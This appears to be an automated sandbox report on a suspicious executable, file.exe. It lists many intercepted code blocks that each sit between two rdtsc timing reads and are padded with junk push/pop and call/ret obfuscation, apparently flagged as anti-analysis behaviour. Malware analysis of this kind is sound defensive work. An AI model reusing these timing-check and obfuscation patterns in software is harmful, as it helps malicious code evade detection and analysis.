                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7888B second address: A7892B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FA9347D66C8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007FA9347D66B8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0165h] 0x00000041 and ebx, 5DF52F65h 0x00000047 push FFFFFFFFh 0x00000049 nop 0x0000004a pushad 0x0000004b jp 00007FA9347D66B8h 0x00000051 push esi 0x00000052 pop esi 0x00000053 jmp 00007FA9347D66C9h 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA9347D66C8h 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7A948 second address: A7A94E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DE3B second address: A7DE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA9347D66B6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7EDC2 second address: A7EDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA934C8B326h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA934C8B337h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7EDE7 second address: A7EDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA9347D66B6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88187 second address: A8818D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8818D second address: A88191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C95 second address: A80C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C99 second address: A80C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80C9D second address: A80CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83D00 second address: A83D2C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA9347D66B6h 0x00000011 jmp 00007FA9347D66C3h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83D2C second address: A83D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80D62 second address: A80D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9197E second address: A91982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A91982 second address: A91988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A237A6 second address: A237B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA934C8B326h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288BC second address: A288C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288C0 second address: A288C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288C5 second address: A288FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FA9347D66C2h 0x00000011 pushad 0x00000012 je 00007FA9347D66B6h 0x00000018 jp 00007FA9347D66B6h 0x0000001e jmp 00007FA9347D66BBh 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E86B second address: A9E87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA934C8B32Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E87F second address: A9E883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E883 second address: A9E894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E894 second address: A9E89A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9E89A second address: A9E8B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA934C8B334h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9ED1B second address: A9ED5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA9347D66C7h 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FA9347D66C8h 0x00000015 js 00007FA9347D66BEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EEAE second address: A9EEB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EEB3 second address: A9EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F03B second address: A9F053 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA934C8B326h 0x00000008 jmp 00007FA934C8B32Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F053 second address: A9F05A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F173 second address: A9F186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA934C8B326h 0x0000000a popad 0x0000000b ja 00007FA934C8B32Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F186 second address: A9F1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA9347D66CAh 0x0000000d jmp 00007FA9347D66C4h 0x00000012 jmp 00007FA9347D66BBh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F1B2 second address: A9F1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9F1B8 second address: A9F1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37A50 second address: A37A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37A54 second address: A37A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66BDh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37A75 second address: A37A8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B334h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA32A1 second address: AA32C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 jmp 00007FA9347D66C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA32C8 second address: AA32D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA32D0 second address: AA32F7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA9347D66BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66BCh 0x00000012 jno 00007FA9347D66B6h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA32F7 second address: AA330F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA934C8B326h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FA934C8B34Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA330F second address: AA3319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA9347D66B6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3319 second address: AA331D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA331D second address: AA3326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3326 second address: AA332C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA348B second address: AA34B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA9347D66B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FA9347D66C8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA34B6 second address: AA34C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 jns 00007FA934C8B326h 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DC7 second address: AA3DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FA9347D66C8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DE7 second address: AA3DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3DED second address: AA3E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007FA9347D66ECh 0x0000000c jmp 00007FA9347D66C7h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3F8B second address: AA3F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA411F second address: AA4126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4126 second address: AA414F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FA934C8B32Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FA934C8B32Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA414F second address: AA4154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4154 second address: AA415E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA934C8B32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA415E second address: AA416C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007FA9347D66B6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA70FE second address: AA7104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7104 second address: AA710A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA710A second address: AA710F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAF46 second address: AAAF78 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA9347D66D5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FA9347D66D0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73350 second address: A56939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA934C8B328h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push edx 0x00000026 xor edx, dword ptr [ebp+122D35F7h] 0x0000002c pop ecx 0x0000002d lea eax, dword ptr [ebp+1248811Bh] 0x00000033 mov edx, esi 0x00000035 push eax 0x00000036 jnp 00007FA934C8B32Ch 0x0000003c mov dword ptr [esp], eax 0x0000003f and edx, dword ptr [ebp+122D1844h] 0x00000045 call dword ptr [ebp+122D352Eh] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7398D second address: A73991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73991 second address: A739BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA934C8B339h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73DE4 second address: A73DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73DE8 second address: A73DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73DEE second address: A73DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73DFC second address: A73E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D2563h] 0x00000012 movzx ecx, cx 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FA934C8B328h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov ecx, edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007FA934C8B33Dh 0x0000003c jmp 00007FA934C8B337h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73E6C second address: A73E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7413B second address: A74140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74140 second address: A74146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74146 second address: A7414A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7414A second address: A7419F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor edx, 7B78A10Ch 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FA9347D66B8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 nop 0x00000032 push ebx 0x00000033 push ecx 0x00000034 jmp 00007FA9347D66BAh 0x00000039 pop ecx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c pushad 0x0000003d jbe 00007FA9347D66B8h 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74353 second address: A74358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74358 second address: A7435D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A744F1 second address: A7450B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7450B second address: A7452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA9347D66BFh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7452C second address: A74530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74530 second address: A74536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74536 second address: A7453C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7453C second address: A7454E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74601 second address: A7460B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57558 second address: A5759B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 jmp 00007FA9347D66C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jbe 00007FA9347D66B6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 push eax 0x0000001a js 00007FA9347D66B6h 0x00000020 pop eax 0x00000021 popad 0x00000022 jc 00007FA9347D66CAh 0x00000028 pushad 0x00000029 jnl 00007FA9347D66B6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF1C9 second address: AAF1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA934C8B326h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF1D6 second address: AAF1F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA9347D66BBh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jc 00007FA9347D66B6h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF1F3 second address: AAF1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF4E4 second address: AAF4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA9347D66B6h 0x0000000d jnl 00007FA9347D66B6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAF77C second address: AAF784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAFBD8 second address: AAFC05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 push edi 0x00000008 jns 00007FA9347D66B6h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FA9347D66C2h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB547D second address: AB5481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3EF6 second address: AB3EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
